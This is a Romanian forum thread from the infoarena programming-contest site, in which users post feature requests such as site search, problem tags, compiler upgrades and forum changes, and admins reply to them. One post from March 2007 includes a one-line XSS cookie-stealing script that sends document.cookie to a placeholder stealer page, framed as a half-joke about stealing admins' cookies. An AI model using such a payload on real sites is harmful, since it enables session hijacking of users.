infoarena

Comunitate - feedback, proiecte si distractie => Feedback infoarena => Subiect creat de: Cristian Strat din Noiembrie 27, 2006, 20:50:51



Titlul: Feature request
Scris de: Cristian Strat din Noiembrie 27, 2006, 20:50:51
Crezi ca infoarena are neaparat nevoie de un anumit feature?
Explica-ne aici ce vrei de la infoarena.

...dar poate ca ne-am gandit is noi ;) Vezi mai intai facilitatile planificate pentru lansarea oficiala 2.0:

Click aici sa vezi ce facilitati am planificat (http://hackers.devnet.ro/query?type=feature&status=new&status=assigned)


Titlul: Raspuns: Feature request
Scris de: Paul-Dan Baltescu din Noiembrie 27, 2006, 22:15:15
La statisticile unei probleme (sper ca acest feature ramane), userii cu punctaje egale sa fie sortati in functie de timpii obtinuti.  :)

In timpul unui concurs, userii cu punctaj egal sa fie sortati in functie de numarul de submisii.


Titlul: Raspuns: Feature request
Scris de: Adrian Vladu din Noiembrie 28, 2006, 00:43:10
De pe forum a disparut optiunea "Mesaje noi de la ultima autentificare". Cred ca ar fi bine sa fie bagata la loc  :-'


Titlul: Raspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Noiembrie 28, 2006, 10:51:53
... Nu mai exista moderatori? :-'


Titlul: Raspuns: Feature request
Scris de: Cristian Strat din Noiembrie 28, 2006, 16:27:19
... Nu mai exista moderatori? :-'

Facem si lista de moderatori inapoi :)


Titlul: Raspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Noiembrie 29, 2006, 10:03:15
Inca ceva, as zice ca ar fi mult mai bine daca ar ramane problemele sortate exact ca inainte (nu in ordine alfabetica)... cei care s-au obisnuit deja cu siteul vechi le e cam greu sa stie ce probleme mai trebuie sa faca (spre exemplu unii au terminat sa zicem primele 2 "capitole"... si le e mai usor sa se uite doar pe capitolele 3-6). De asemenea, problemele care se vor adauga dupa un concurs in arhiva vor fi greu de gasit in lista ordonata alfabetic...


Titlul: Raspuns: Feature request
Scris de: Savin Tiberiu din Noiembrie 30, 2006, 12:16:28
sunt de acord cu tine bogdane intr-o oarecare masura, nu e bine cum sunt ordonate problemele acum prin faptul ca sunt acele 2 probleme de initiere in sistemul infoarena (cmmdc si a+b) care ar trebui sa fie la inceput.
Parerea mea nush dak poate fi implementata fiind destul de muncitoresc si nush dak e posibil : sa se faca un meniu in care sa se precizeze : probleme de dinamica, probleme de grafuri, etc.


Titlul: Raspuns: Feature request
Scris de: Cristian Strat din Noiembrie 30, 2006, 15:32:37
sa se faca un meniu in care sa se precizeze : probleme de dinamica, probleme de grafuri, etc.

we will have tags: http://hackers.devnet.ro/ticket/19 albeit some time later


Titlul: Raspuns: Feature request
Scris de: Marius Stroe din Decembrie 04, 2006, 11:44:45
Ar fi mai bine daca ati afisa timpii de executie pentru fiecare test al unei probleme.
Tind sa cred ca aveti un evaluator mai rapid... din moment ce TLE-uri de pe infoarena 1 mi-au disparut aici. :)


Titlul: Raspuns: Feature request
Scris de: Dan-Leonard Crestez din Decembrie 04, 2006, 13:15:49
Ar fi mai bine daca ati afisa timpii de executie pentru fiecare test al unei probleme.
Tind sa cred ca aveti un evaluator mai rapid... din moment ce TLE-uri de pe infoarena 1 mi-au disparut aici. :)

Timpii sunt afisati (urat), vezi http://infoarena.ro/job_detail?id=44 (http://infoarena.ro/job_detail?id=44). Nu se vedeau din cauza unui bug de evaluare. Log-ul de evaluare ar trebui afisat intr-un tabel cumva...

E acelasi sistem de evaluare, dar e alt soft. Soft-ul nou masoara timpul efectiv folosit de program, nu ceasul sistemul. Aparent merge un pic mai rapid. Infoarena.ro ruleaza momentan pe acelasi sistem cu evaluatorul vechi, asa ca oricum evalu' vechi acum merge mai prost ca de obicei.


Titlul: Raspuns: Feature request
Scris de: Marius Stroe din Decembrie 04, 2006, 16:33:47
Am gasi mai usor daca la Trimite Solutii numele problemelor ar fi in ordine alfabetica. Zic eu ...


Titlul: Raspuns: Feature request
Scris de: Cristian Strat din Decembrie 04, 2006, 16:38:38
Am gasi mai usor daca la Trimite Solutii numele problemelor ar fi in ordine alfabetica. Zic eu ...

alternativ poti sa trimit solutii direct din footer-ul unei probleme


Titlul: Raspuns: Feature request
Scris de: Marius Stroe din Decembrie 05, 2006, 10:49:04
Unde este functia Search pe Forum ?


Titlul: Raspuns: Feature request
Scris de: Adrian Vladu din Decembrie 05, 2006, 11:25:14
Lipsesc mai multe chesti de pe forum :-' Dar vor aparea ele la loc...candva  :P


Titlul: Raspuns: Feature request
Scris de: Andrei Grigorean din Decembrie 05, 2006, 12:30:32
Diferente fata de site-ul vechi:
  • problemele erau numerotate si era trecut si autorul
  • la clasament aparea numarul de probleme la care s-a trimis sursa
  • in timpul evaluarii se afisa in monitor numarul testului curent

Cand faceti sectiunea de "Statistici pentru fiecare problema", ati putea sa puneti un "Best accepted solutions"

Si inca ceva... ar fi bine daca fiecare si-ar putea vedea sursele trimise, iar autorul unei probleme toate sursele la problema respectiva


Titlul: Raspuns: Feature request
Scris de: Cristian Strat din Decembrie 05, 2006, 13:10:11
Si inca ceva... ar fi bine daca fiecare si-ar putea vedea sursele trimise, iar autorul unei probleme toate sursele la problema respectiva
asta e aproape implementat ;)


Titlul: Raspuns: Feature request
Scris de: Andrei Grigorean din Decembrie 08, 2006, 12:08:20
 =D> Am vazut ca ati implementat optiunea de vizualizat surse.

Din pacate nu e prea comod sa dai in monitorul de evaluare sa iti vezi solutia trimisa... daca de exemplu doresc sa vizualizez o sursa trimisa cu mult timp in urma se complica treaba. In schimb, ar fi mai usor daca am avea link-ul de vizualizare sursa in arhiva, pe pagina fiecarei probleme.  :peacefingers:


Titlul: Raspuns: Feature request
Scris de: Mircea Dima din Decembrie 11, 2006, 18:06:36
Un search la probleme ar fi util  :)


Titlul: Raspuns: Feature request
Scris de: Valentin Stanciu din Decembrie 11, 2006, 19:07:10
Un search la probleme ar fi util  :)

o sa existe posibilitatea sa faci search pe tot siteul


Titlul: Raspuns: Feature request
Scris de: Bondane Cosmin din Decembrie 11, 2006, 19:56:45
nu am stiut exact unde sa postez, asa postez aici.

Cum pot sa imi modific 'semnatura' pe forum ? Sau nu mai exista optiunea ?


Titlul: Raspuns: Feature request
Scris de: Cristian Strat din Decembrie 11, 2006, 20:16:33
nu am stiut exact unde sa postez, asa postez aici.

Cum pot sa imi modific 'semnatura' pe forum ? Sau nu mai exista optiunea ?
Deocamdata nu exista si nu e planificata pentru curand. In cel mai bun caz, le scoatem pe toate :)


Titlul: Raspuns: Feature request
Scris de: Bondane Cosmin din Decembrie 17, 2006, 23:12:51
la arhiva de probleme sa puneti si deasupra listei, linkuri catre pag. 1,2.. (cum este sub lista)


Titlul: Raspuns: Feature request
Scris de: Ivan Nicolae din Decembrie 17, 2006, 23:28:28
Ar fi o idee frumoasa  :D O alta sugestie interesanta ar fi sa faceti ceva a.i. cand vreau sa vad profilul cuiva sa nu umblu pe site pan' dau de un link. Ceva gen un search pentru utilizatori.


Titlul: Raspuns: Feature request
Scris de: Valentin Stanciu din Decembrie 18, 2006, 17:26:44
Ar fi o idee frumoasa  :D O alta sugestie interesanta ar fi sa faceti ceva a.i. cand vreau sa vad profilul cuiva sa nu umblu pe site pan' dau de un link. Ceva gen un search pentru utilizatori.

O sa existe posibilitatea sa faci search pe tot siteul!! (e a treia oara cand zic asta...)
Asta include probleme, utilizatori, articole.. tot teoretic


Titlul: Raspuns: Feature request
Scris de: Ivan Nicolae din Decembrie 18, 2006, 20:17:17
Scuze... am citit de inca 2 ori pe forum... dar nu mi-a trecut prin cap cand am scris postul de mai sus.


Titlul: Raspuns: Feature request
Scris de: Paul-Dan Baltescu din Ianuarie 11, 2007, 10:57:08
Puteti face un buton care sa marcheze unele mesaje necitite? Mie mi se pare util atunci cand incepi sa citesti un post si nu ai timp sa-l termini de citit sau doresti sa revii la el alta data.


Titlul: Raspuns: Feature request
Scris de: Valentin Stanciu din Ianuarie 11, 2007, 15:23:59
daca te referi la forum, pune sugestia asta pe site SMF :)


Titlul: VREAU PAGINA CU SCRISURI(GRAFURI)
Scris de: andr3iteo din Ianuarie 25, 2007, 00:18:47
 :Dvreau si eu o pagina in care scriu cun cuvant de exemplu : andrei si mil transforma intrun graf adica scris mai accesntualt bla...


Titlul: Raspuns: Feature request
Scris de: Barsan Paul din Ianuarie 26, 2007, 17:34:04
Daca ati putea face monitorul de evaluare in mai multe sesiuni, adica problemele trimise in timpul unui concurs sa nu se amestece cu cele de pe arhiva.
  Si butonul de reload automat, tot la monitor, ar fi bine venit... parerea mea :D


Titlul: Raspuns: Feature request
Scris de: Paul-Dan Baltescu din Februarie 04, 2007, 17:07:27
Ar trebui modificata pagina principala. Desi sunt foarte interesante noile avantaje ale infoarenei, nu se vad stirile noi. Si se mai prinde lumea noua pe parcurs cum sta treaba. :)


Titlul: Raspuns: Feature request
Scris de: Filipas Ciprian din Februarie 16, 2007, 08:42:16
Un search ar prinde foarte bine...


Titlul: Raspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Februarie 16, 2007, 09:22:42
...

O sa existe posibilitatea sa faci search pe tot siteul!! (e a treia oara cand zic asta...)
Asta include probleme, utilizatori, articole.. tot teoretic


Titlul: Raspuns: Feature request
Scris de: chris din Februarie 21, 2007, 15:43:24
Daca se poate puneti la dispozitie compilatoare pentru mai multe limbaje gen java, python, lisp...Exista compilatoare gratuite, si disponibile ca pachete pentru linux pentru aceste limbaje.


Titlul: Raspuns: Feature request
Scris de: Sima Cotizo din Februarie 21, 2007, 20:43:53
E vreo sansa sa fie folosit jrun si pentru programe Java? Intai s-a plans ca a fost apelat "clone". Daca il las sa faca asta zice "exec: fork: Resource temporarily unavailable" si n-am idee ce inseamna.

Inseamna ca nu merge cu java fara modificari majore.

Cred ca s-a mai pus in discutie...


Titlul: Raspuns: Feature request
Scris de: Cristian Strat din Februarie 22, 2007, 06:30:55
Un search ar prinde foarte bine...

Pana la search-ul adevarat (i.e. peste tot site-ul), am activat cautarea pe forum. E un link in dreapta sus.


Titlul: Raspuns: Feature request
Scris de: Nicodei Eduard din Februarie 22, 2007, 19:28:10
Ma gandeam daca s-ar putea un clean-up pe site. Sunt utilizatori care nu au mai fost activi de ceva vreme, subiecte pe forum la care nu s-a mai scris din 2004-2005 si alte chestii de genul asta. Mie nu-mi place cand trebuie sa ma uit prin nu stiu cate subiecte la forumuri pana gasesc ceva interesant si cand vreau sa raspund, sa-mi zica: "nu s-au mai scris mesaje pe acest subiect de n zile". Si nici la arhiva de probleme: sunt cam 130 de utilizatori cu 0 puncte si vreo 510 cu punctaj sub 200.
Poate ca ar trebui facut un sistem care sa dezactiveze aceste lucruri invechite. La forum-uri se poate pune o sectiune speciala. La utilizatori ar merge dezactivarea contului, adica, sa nu mai apara in clasamente dar sa fie totusi stocate datele lor. Astfel, cand vor intra din nou pe infoarena, sa le fie reactivat contul. Eu asa zic.


Titlul: Raspuns: Feature request
Scris de: Sima Cotizo din Februarie 22, 2007, 20:58:46
Citat
La utilizatori ar merge dezactivarea contului, adica, sa nu mai apara in clasamente dar sa fie totusi stocate datele lor. Astfel, cand vor intra din nou pe infoarena, sa le fie reactivat contul.
Asta e total echivalent cu sa lasi conturile in pace. ;)  :thumbup:


Titlul: Raspuns: Feature request
Scris de: Valentin Stanciu din Februarie 22, 2007, 21:02:08
Eu personal nu sunt de acord cu dezactivarea conturilor. Daca mi-am facut un cont, imi place sa stiu ca va fi acolo si peste x luni, chiar daca nu fac nimic cu el.
La forum poate ar fi folositor.. timpul trece, lucrurile se schimba si anumite topicuri devin inutile


Titlul: Raspuns: Feature request
Scris de: Nicodei Eduard din Februarie 22, 2007, 21:47:09
ok then, accounts will be left alone.
peace :peacefingers:


Titlul: Raspuns: Feature request
Scris de: Dan-Leonard Crestez din Februarie 23, 2007, 13:36:52
Voi ce parere aveti despre ticket-ul asta http://hackers.devnet.ro/ticket/269 (http://hackers.devnet.ro/ticket/269)?


Titlul: Raspuns: Feature request
Scris de: Andrei Grigorean din Februarie 23, 2007, 20:02:26
Nu cred ca va fi prea multa luma afectata de schimbare.  :peacefingers:


Titlul: Raspuns: Feature request
Scris de: Savin Tiberiu din Februarie 23, 2007, 21:26:04
Citat
La forum poate ar fi folositor.. timpul trece, lucrurile se schimba si anumite topicuri devin inutile
aici nu prea sunt eu de acord cu tine. Adik dak e un topic inutil f mare, care mananca multa memorie atunci ar putea fi sters, dar dak stergerea lui nu ar afecta in mare masura memoria serverului atunci nu vad de ce ar fi sters. Din 99% din topicurile de pe acest forum poti invata ceva nou. Cele cu adevarat inutile poate sunt cele de la offtopic care nu contin "material stiintific", dar si astea au rol de recreere ;).


Titlul: Raspuns: Feature request
Scris de: Valentin Stanciu din Februarie 23, 2007, 22:09:55
eu ma gandeam de exemplu la cele despre probleme (tehnice) ce acum sunt rezolvate.. sau intrebari despre vechiul site/ evaluator
poate nu se gasesc asa multe cazuri totusi..


Titlul: Răspuns: Feature request
Scris de: Tudorica Constantin Alexandru din Martie 03, 2007, 21:33:54
oricum, mai bine decat sa stergeti posturile le puteti arhiva gzip, astfel ar ocupa mai putin spatiu in mysql, dar ar utiliza (posibil) mai mult procesor, oricum chiar daca sunt posturi vechi, unele pot fi importante pentru userii noi veniti, mai incepatori, care au ce invata din ele

Dap, posturile despre probleme tehnice pot fi sterse, nu cred ca ar afecta pe cineva


Titlul: Răspuns: Feature request
Scris de: Nistor Andrei din Martie 06, 2007, 12:18:10
mi-ar placea la pagina fiecarei probleme din arhiva sa fie un link catre discutia din forum despre acea problema. se poate?  :)


Titlul: Răspuns: Feature request
Scris de: Cezar Mocan din Martie 06, 2007, 12:21:51
Stiu ca s-a mai pus asta in discutie acum cateva saptamani. Mie nu mi se pare chiar asa de necesara chestia (desi ar prinde bine), pentru ca acum este search pe forum si nu e chiar asa un chin sa-i dai un search cu numele problemei. :D


Titlul: Răspuns: Feature request
Scris de: Mircea Pasoi din Martie 06, 2007, 20:39:01
mi-ar placea la pagina fiecarei probleme din arhiva sa fie un link catre discutia din forum despre acea problema. se poate?  :)

E pe to-do list.


Titlul: Răspuns: Feature request
Scris de: Suciu Adrian din Martie 06, 2007, 22:02:06
Sortarea problemelor pe nivele de dificultate sau pe clase  :wink: ... sau s-a mai zis ?  :?


Titlul: Răspuns: Feature request
Scris de: Tabara Mihai din Martie 06, 2007, 22:26:23
Sortarea problemelor pe nivele de dificultate sau pe clase  :wink: ... sau s-a mai zis ?  :?

S-a mai zis si a picat.
 :peacefingers:


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Martie 07, 2007, 10:10:05
Totusi o idee ar fi ca in dreptul fiecarei probleme sa apara numarul de punctaje de 100 de pct :). Ar fi un indiciu destul de bun in privinta dificultatii.


Titlul: Răspuns: Feature request
Scris de: Ivan Nicolae din Martie 07, 2007, 11:11:40
 Eventual si cu un link un pic detaliat.... cum era pe infoarena 1.0.....


Titlul: Răspuns: Feature request
Scris de: Savin Tiberiu din Martie 07, 2007, 12:02:08
sau un procent cum e pe timus :thumbup:


Titlul: Răspuns: Feature request
Scris de: Petcu Marius din Martie 07, 2007, 20:40:57
nu credeti ca ar fi mult mai practic ca searchul din forum (si eventual viitorul search din tot site-ul)  sa fie direct in pagina forumului nu ca un link in ea? :D


P.S. a aparut FPC 2.0.4 de mult ar  trebui sa il puneti in loc de FPC-ul vostru 1.9(dar banuiesc ca asta va da peste cap timpurile problemelor fiind un pic mai rapid)


Titlul: Răspuns: Răspuns: Feature request
Scris de: Sima Cotizo din Martie 07, 2007, 20:48:20
a si MODERNIZATI-va a aparut FPC 2.0.4

Nu cred ca e frumos sa le ceri sa se modernizeze in felul asta...  [-X poate era mai frumos sa ii rogi sa faca upgrade la fpc 2.0.4 ... stii ca pe alte siteuri compilatoarele sunt foarte vechi si au chiar si buguri...

Ce ai zice daca cineva ti-ar spune "MODERNIZEAZA-te si treci pe c++, pascal nu mai foloseste nimeni?"... raspunsul tau: "ba da, mai folosesc inca multi elevi..." La fel e si la compilatorul asta!

Succes in continuare!

PS: nu am nimic cu ideea de modernizare ci cu acel CAPS care sugerea un urlet... vad ca ai modificat :) sorry daca te-a deranjat remarca


Titlul: Răspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Martie 07, 2007, 21:04:14
FPC-ul vostru 1.9
De unde ai scos-o p-asta?

Unul din job-urile tale: http://infoarena.ro/job_detail/23557
Citat
Compilare:
Free Pascal Compiler version 2.0.4 [2007/01/28] for i386

http://infoarena.ro/documentatie/evaluator


Titlul: Răspuns: Feature request
Scris de: Petcu Marius din Martie 07, 2007, 21:06:37
acum cateva saptamani mi s-a parut ca am vazut acolo 1.9 si ceva






PS:sorry de chestia cu "MODERNIZATI-va" nu prea sunt in apele mele azi


Titlul: Răspuns: Feature request
Scris de: bkuyfk din Martie 08, 2007, 11:50:59
din cate am explorat situ singura chestie care nu mi place e textile sau cum o fi numele. Adik atunci cand am incercat sa mi editez pagina de profil am stat 10 min numa k sa pricep textile, pana la urma am renuntat. eu zic sa folositi (x)html pt ediatarea acelei pagini de profil sau va e frica k cineva va folosi ceva de genu: <script>document.location="http://un_site.ceva/cookiestealer.php?c="+document.cookie);</script>

p a fura cookieurile adminilor  :D, din pacate in forum se pare k nu merge  :sad:

si propun o sectiune de programare unde spre exemplu sa folosesti php+curl adik o problema sa sune ceva de genu

JonDoe a invatat cateveva despre criptografie, dar problema lui este urmatoarea: de fiecare data cand intra pe situl unui prieten pt a citi annumite notite observa k acestea sunt criptate dar de fiecare data cu un alt algoritm(base2-base64). Ajutati l sa descopere mesajul ascuns

precizari:
pagina de web de unde se iau datele de intrare sa aiba formatul
tip algoritm criptare base2-base64
un text de genu "mai jos este mesajul pt tine"
mesajul criptat

intoarce raspunul k POST la base2_64.php in variabila decrypted. timp maxim de executie 3 sec

mie mi se pare mult mai interesanta o asa problema decat "parcurgeti o matrice in zig zag" sau problema aia Flip
astept pareri


Titlul: Răspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Martie 08, 2007, 14:18:13
Cum poate sa ti se para mai usor XHTML decat Textile?.. ai citit macar articolu de pe site de la documentatie?


Titlul: Răspuns: Feature request
Scris de: bkuyfk din Martie 08, 2007, 14:25:23
(x)html e mult mai usor de inteles <b> </b> imediat iti dai seama k e scris ingrosat(bold) pe cand la textile nu mai stiu park * deci dupa parerea mea textile =  :thumbdown:  adik nu am chef sa inv ceva care nu mi este util cu (x)html poti face mult. este doar parerea mea


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Martie 08, 2007, 14:29:01
Nu iti ia mai multe de 10-15 minute sa citesti articolul de pe site de care vorbea si Bogdan... Nu cred ca vei mai avea probleme apoi.   :peacefingers:


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Martie 08, 2007, 18:34:13
Sper sa nu par rautacios, dar daca unui om nu ii place un lucru, nu inseamna ca acel lucru este mai prost/ greu de invatat/ <mai adauga ce vrei> :) (tie iti este probabil mai usor de inteles html fiindca ai mai lucrat cu el..) Daca vrei, putem face un poll in care sa intrebam utilizatorii cum ar vrea sa fie sintaxa paginilor.. Cu (x)html trebuie sa ai grija la mai multe chestii; securitatea fiind una din ele. Oricum, nu cred ca o sa se schimbe, trebuie modificata o bucata maricica din site.. (textila se imbina cu macrourile si alte mici "detalii")

Legat de propunerea ta de probleme - oricum ne mai gandeam sa extindem capabilitatile evaluatorului si la alte limbaje, plus probleme mai practice (parsat xml de exemplu); deci cine stie, poate o sa fie si php suportat :)


Titlul: Răspuns: Feature request
Scris de: bkuyfk din Martie 08, 2007, 19:23:58
 :oops: a fost doar o parere si useri sunt deja obisnuiti cu textile. pana la urma am reusit sa l pricep, dar inca nu am reusit sa aflu cum adaugi tabele.

referitor la problema pe care am propus o dak e o poti face si in c/c++ dar ink nu stiu atatea la c/c++, stiti cum e trebuie sa vezi problema din mai multe unghiuri

[eliminat de SsAgEnT]


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Martie 08, 2007, 19:39:42
legat de pascal:
1. nu mai posta in afara subiectului (desi, am inteles ca nu era principalul subiect)
2. vrei sa spui object oriented pascal, nu delphi; delphi este doar un editor

in C/C++ poti face orice.. conteaza doar cat de mult scrii :)

(daca vrei, continuam discutia in alt thread, sa ramanem la subiect)


Titlul: Răspuns: Feature request
Scris de: Tudorica Constantin Alexandru din Martie 08, 2007, 20:40:36

JonDoe a invatat cateveva despre criptografie, dar problema lui este urmatoarea: de fiecare data cand intra pe situl unui prieten pt a citi annumite notite observa k acestea sunt criptate dar de fiecare data cu un alt algoritm(base2-base64). Ajutati l sa descopere mesajul ascuns

precizari:
pagina de web de unde se iau datele de intrare sa aiba formatul
tip algoritm criptare base2-base64
un text de genu "mai jos este mesajul pt tine"
mesajul criptat

intoarce raspunul k POST la base2_64.php in variabila decrypted. timp maxim de executie 3 sec

mie mi se pare mult mai interesanta o asa problema decat "parcurgeti o matrice in zig zag" sau problema aia Flip
astept pareri
hmmm....cred ca un site cu astfel de probleme este www.hellboundhackers.org (http://www.hellboundhackers.org)
Have fun!
Scz de offtopic!


Titlul: Răspuns: Feature request
Scris de: Stefan Istrate din Martie 20, 2007, 12:31:52
Ar fi util ca fiecare problema sa poata primi unul sau mai multe label-uri, astfel incat sa se poata face cautari in arhiva de probleme dupa label. De exemplu, toate problemele din arhiva care au fost date la nationala sa aiba label-ul ONI. La fel de util ar fi sa poata exista cautari in functie de autorul problemei. :)


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Martie 20, 2007, 14:06:15
labelurile sunt in plan, dar nu doar pentru probleme :)


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Martie 20, 2007, 20:09:01
Bine, dar sa nu fie labeluri modificabile... ca se poate sa se ajunga la labeluri "PD" sau "Greedy" sau "Flux".. si ar rezulta impartirea in tipuri de probleme, ceea ce ati zis si voi ca nu prea e obiectivul infoA...


Titlul: Răspuns: Feature request
Scris de: Bogdan-Cristian Tataroiu din Martie 30, 2007, 08:32:40
Forumul infoarena se umple de spam.. Ar trebui sa nu se mai poata posta fara utilizator (anonim)... deja bugurile care erau cu logarea au disparut demult. Si ar fi bine si un captcha pt inregistrare :)


Titlul: Răspuns: Feature request
Scris de: Nicodei Eduard din Aprilie 04, 2007, 10:25:50
de ce nu mai apare numele userului pe forum si apare doar ID-ul? e un bug?


Titlul: Răspuns: Feature request
Scris de: Andrei Homorodean din Aprilie 04, 2007, 17:05:57
Parca era mai sweet cand ni se vedea numele.. :(


Titlul: Răspuns: Feature request
Scris de: Cristian Strat din Aprilie 05, 2007, 14:52:58
Ce, e mai bine cu nume?


Titlul: Răspuns: Feature request
Scris de: Stefan Istrate din Aprilie 05, 2007, 15:13:46
Eu zic ca e mai bine cu ID-uri. Cu nume era prea oficial. :)


Titlul: Răspuns: Feature request
Scris de: Sima Cotizo din Aprilie 05, 2007, 19:12:34
Pe mine ma enerveaza sa mi se zica "ai / n-ai dreptate, sima_cotizo"... bine, dar asta e, ghinionul meu ca mi-am pus tot numele in ID... :)


Titlul: Răspuns: Feature request
Scris de: Nicodei Eduard din Aprilie 05, 2007, 22:13:48
atuncea punem si id si nume  :-'


Titlul: Răspuns: Feature request
Scris de: Cezar Mocan din Aprilie 06, 2007, 08:17:09
Pe mine ma enerveaza sa mi se zica "ai / n-ai dreptate, sima_cotizo"... bine, dar asta e, ghinionul meu ca mi-am pus tot numele in ID... :)
Pe tine te stie lumea de Coty... Deci nu-ti face probleme.  :peacefingers:


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Aprilie 08, 2007, 10:00:59
Mie personal nu imi placea deloc cu nume. Ce naiba, nimeni nu imi spune Andrei! :P


Titlul: Răspuns: Feature request
Scris de: voicu hodrea din Aprilie 10, 2007, 19:16:58
nu se poate alege un alt mod de compilare pt. surse? la problema regiuni limita de memorie este 256kb. programul meu nu are cum sa foloseasca mai mult de 50kb:

struct line { int a,b,c; };
struct point { int x,y; };

struct line l[1000];
struct point p[1000];
int rp[1000],r[1000],nr=0;

asta ii tot ce foloseste programul meu... calculat ar fi 28kb.
/*totusi cand compilez cu optiunea -O2 iese un fisier de 1,1mb (!!). si se pare ca #pragma option -O0 nu are efect (zice "warning: ignoring pragma option"). am cautat in man g++ da n-am gasit nimic sa ma ajute.*/

EDIT: se pare ca problema ii -static. din cauza lui programu creste mult. evaluatorul tine cont de toata memoria folosita sau numa cea declarata in cod? la altii se pare ca le-o mers


Titlul: Răspuns: Feature request
Scris de: Andrei Grigorean din Aprilie 15, 2007, 19:54:52
Daca nu folosesti struct-uri, iti merge? Incearca ;)


Titlul: nu merge
Scris de: voicu hodrea din Aprilie 17, 2007, 16:44:47
am incercat mai multe variante si n-o vrut. daca pun array in loc de struct ii practic tot acolo, intern se intampla acealeasi lucruri. chestia ii ca atunci cand g++ compileaza cu -static pune acolo tot ce-ti trebe si ce nu-ti trebe. si nu vad cum evaluatorul isi poate da seama care cod si date is cele necesare pt. rulare si care is cele scrise de user. da cum de le merge la altii care au folosit c++?


Titlul: Răspuns: Feature request
Scris de: Valentin Stanciu din Aprilie 20, 2007, 08:51:35
scoate toate librariile incluse care nu iti trebuie


Titlul: Răspuns: Feature request
Scris de: Petcu Marius din Mai 12, 2007, 16:35:53
Cand e gata search-ul? Mie dor de cel din Infoarena 1.0. :sad: Ma dau cu capul de pereti pana gasesc o problema in arhiva. ](*,)


Titlul: Răspuns: Răspuns: Feature request
Scris de: Ivan Nicolae din Mai 14, 2007, 00:33:08
 presupun ca echipa infoarena e destul de ocupata acum (avand in vedere ca la fackultate e sesiune...cred) sa nu mai vb de ca acuma e si sesiune de pregatire a lotului.... cred ca daca nu ne oferim noi sa-l facem o sa tine ceva....  :-'   


Titlul: Răspuns: Răspuns: Feature request
Scris de: Silviu-Ionut Ganceanu din Mai 14, 2007, 21:56:03
presupun ca echipa infoarena e destul de ocupata acum (avand in vedere ca la fackultate e sesiune...cred) sa nu mai vb de ca acuma e si sesiune de pregatire a lotului.... cred ca daca nu ne oferim noi sa-l facem o sa tine ceva....  :-'   

Pai spuneai ca te bagi chiar tu la un moment dat. Ai reusit sa-ti mai eliberezi ceva timp?

Silviu


Titlul: Răspuns: Răspuns: Feature request
Scris de: Ivan Nicolae din Mai 15, 2007, 09:11:41
da..... am reusit sa-mi eliberez timp... si in curand o sa mi se tot elibereze...deci eu as putea sa ma bag  :)


Titlul: Răspuns: Feature request
Scris de: Silviu-Ionut Ganceanu din Mai 15, 2007, 11:04:32
Marfa! Vad ca esti din Bucuresti. Ai putea sa vii chiar la urmatorul nostru Coding Camp care are loc pe 26-27 Mai.

Suntem cam offtopic asa ca o sa continuam discutia personal.

Silviu


Titlul: Răspuns: Feature request
Scris de: Ivan Nicolae din Mai 15, 2007, 11:38:11
ok id-ul meu de mess e: nicu543 .... probabil ca azi nu voi fi online pana in 10   (ora 22)


Titlul: Răspuns: Răspuns: Feature request
Scris de: Florian Marcu din Mai 17, 2007, 14:14:03
Cand e gata search-ul? Mie dor de cel din Infoarena 1.0. :sad: Ma dau cu capul de pereti pana gasesc o problema in arhiva. ](*,)

Pai din moment ce stii problema e usor de intrat pe www.infoarena.ro/problema/nume_problema  :thumbup: E bine si asa pana se va implementa search-ul...


Titlul: Răspuns: Feature request
Scris de: Codrea Marcel din Mai 17, 2007, 15:11:00
Cand e gata search-ul? Mie dor de cel din Infoarena 1.0. :sad: Ma dau cu capul de pereti pana gasesc o problema in arhiva. ](*,)

Pai din moment ce stii problema e usor de intrat pe www.infoarena.ro/problema/nume_problema  :thumbup: E bine si asa pana se va implementa search-ul...

Daca luam spre exemplu problema Siruri 2-3 monotone nu ai cum sa intri pe www.infoarena.ro/problema/nume_problema .
Cred ca intotdeauna ar merge sa intri pe www.infoarena.ro/problema/id_problema unde id-ul este de fapt denumirea fisierului de intrare/iesire.
Nici eu nu consider ca ar fi prea util un search, dar nu strica, mai ales daca s-ar introduce prin tot site-ul si nu numai prin arhiva.     :peacefingers:


Titlul: Răspuns: Feature request
Scris de: Florian Marcu din Mai 17, 2007, 15:19:31
Intr-adevar! Un search e mai util decat asa. Se pot cauta useri, probleme, articole si tot ce contine site-ul. Insa pentru probleme si eventual useri e buna si ideea mea...cred...[ps: ai dreptate! id-ul problemei trebuie scris, si nu numele problemei, desi dak stam si analizam putin peste 60% din probleme au numele identic ku id-ul :-'  :aha: ]


Titlul: Răspuns: Feature request
Scris de: Cristian Strat din Mai 18, 2007, 15:50:16
Se lucreaza :ahem: la niste smenuri care o sa va permita sa cautati tot ce vreti. :) Rabdare nitel


Titlul: Răspuns: Feature request
Scris de: Matei Misarca din Iulie 09, 2007, 23:25:11
La ultimul concurs (junior challenge) nu s-a trimis mail de instintzare (cred ca din cauza ca nu a fost concurs ca rating) si uni l-au ratat din aceasta cauza.

Mie mi-ar place sa se trimita la orice fel de concurs mail :D

Si mi-ar mai placea ca la problemele care au fost date la o anumita clasa sau grupa (.campion) la sursa sa apara ceva de genu .campion grupa M, sau ONI cls 11-12. astfel nici nu se clasifica problemele dupa tip dar totusi potzi cauta mai usor (sper ca nu ma suprapun peste discutzia despre clasificarea problemelor)


Titlul: Răspuns: Feature request
Scris de: Silviu-Ionut Ganceanu din Iulie 10, 2007, 00:42:05
Si mi-ar mai placea ca la problemele care au fost date la o anumita clasa sau grupa (.campion) la sursa sa apara ceva de genu .campion grupa M, sau ONI cls 11-12. astfel nici nu se clasifica problemele dupa tip dar totusi potzi cauta mai usor (sper ca nu ma suprapun peste discutzia despre clasificarea problemelor)

+1

E o clasificare de baza dar e folositoare pana cand vom avea tag-urile.


Titlul: Răspuns: Feature request
Scris de: HighScore din Iulie 23, 2007, 14:22:07
